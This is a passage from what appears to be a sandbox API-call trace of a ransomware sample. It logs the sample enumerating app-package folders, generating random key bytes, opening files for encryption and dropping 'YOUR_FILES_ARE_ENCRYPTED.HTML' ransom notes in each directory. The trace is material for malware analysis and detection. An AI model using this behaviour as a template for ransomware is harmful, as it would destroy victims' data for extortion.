ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0115.263] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.264] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 103 [0115.264] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.264] lstrlenW (lpString=".lock") returned 5 [0115.264] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.264] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0115.264] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.264] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings\\settings.dat") returned 103 [0115.264] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.264] lstrlenW (lpString=".dat") returned 4 [0115.264] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.264] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0115.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingnews_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0115.264] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0115.265] GetProcessHeap () returned 0x600000 [0115.265] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0115.268] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="95") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="EA") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="52") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="65") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="DB") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="8F") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="D6") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="5E") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="7C") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="00") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="D9") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="AE") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="2E") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="D2") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="36") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="98") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="5B") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="AD") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="DC") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="D9") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="13") returned 2 [0115.268] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="50") returned 2 [0115.268] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="26") returned 2 [0115.268] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="B4") returned 2 [0115.268] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="AC") returned 2 [0115.268] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="41") returned 2 [0115.268] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="22") returned 2 [0115.268] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="0E") returned 2 [0115.268] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="6A") returned 2 [0115.268] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="22") returned 2 [0115.269] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="F4") returned 2 [0115.269] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="6E") returned 2 [0115.269] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings\\settings.dat" [0115.269] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0115.269] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0115.269] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0115.270] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.270] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0115.270] GetProcessHeap () returned 0x600000 [0115.270] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingnews_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.271] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.272] CloseHandle (hObject=0x214) returned 1 [0115.272] GetProcessHeap () returned 0x600000 [0115.272] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.272] GetProcessHeap () returned 0x600000 [0115.272] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.273] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0115.273] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.273] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\SystemAppData") returned 95 [0115.273] GetProcessHeap () returned 0x600000 [0115.273] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.273] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\SystemAppData" [0115.273] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\SystemAppData\\*" [0115.273] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626978 [0115.273] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0115.273] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0115.273] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0115.273] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0115.273] GetProcessHeap () returned 0x600000 [0115.273] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingnews_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.274] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.276] CloseHandle (hObject=0x214) returned 1 [0115.276] GetProcessHeap () returned 0x600000 [0115.276] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.276] GetProcessHeap () returned 0x600000 [0115.276] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.276] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0115.276] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.276] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\TempState") returned 91 [0115.276] GetProcessHeap () returned 0x600000 [0115.276] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.276] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\TempState" [0115.276] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\TempState\\*" [0115.276] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.277] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0115.277] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0115.277] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.277] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0115.277] GetProcessHeap () returned 0x600000 [0115.277] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingnews_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.277] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.296] CloseHandle (hObject=0x214) returned 1 [0115.296] GetProcessHeap () returned 0x600000 [0115.297] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.297] GetProcessHeap () returned 0x600000 [0115.297] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.297] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0115.298] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.298] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0115.298] GetProcessHeap () returned 0x600000 [0115.298] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.298] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingnews_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0115.299] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0115.300] CloseHandle (hObject=0x320) returned 1 [0115.300] GetProcessHeap () returned 0x600000 [0115.300] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.300] GetProcessHeap () returned 0x600000 [0115.300] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0115.301] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f19b08, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x29fd18d6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x29fd18d6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.BingSports_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.BIN")) returned 1 [0115.302] StrStrIW (lpFirst="Microsoft.BingSports_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.302] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe") returned 83 [0115.302] GetProcessHeap () returned 0x600000 [0115.302] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0115.303] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe" [0115.303] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\*" [0115.303] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f19b08, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x29fd18d6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x29fd18d6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.305] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f19b08, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x29fd18d6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x29fd18d6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0115.305] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x27470465, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x27470465, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0115.305] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.305] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC") returned 86 [0115.305] GetProcessHeap () returned 0x600000 [0115.305] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.306] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC" [0115.306] lstrcatW (in: 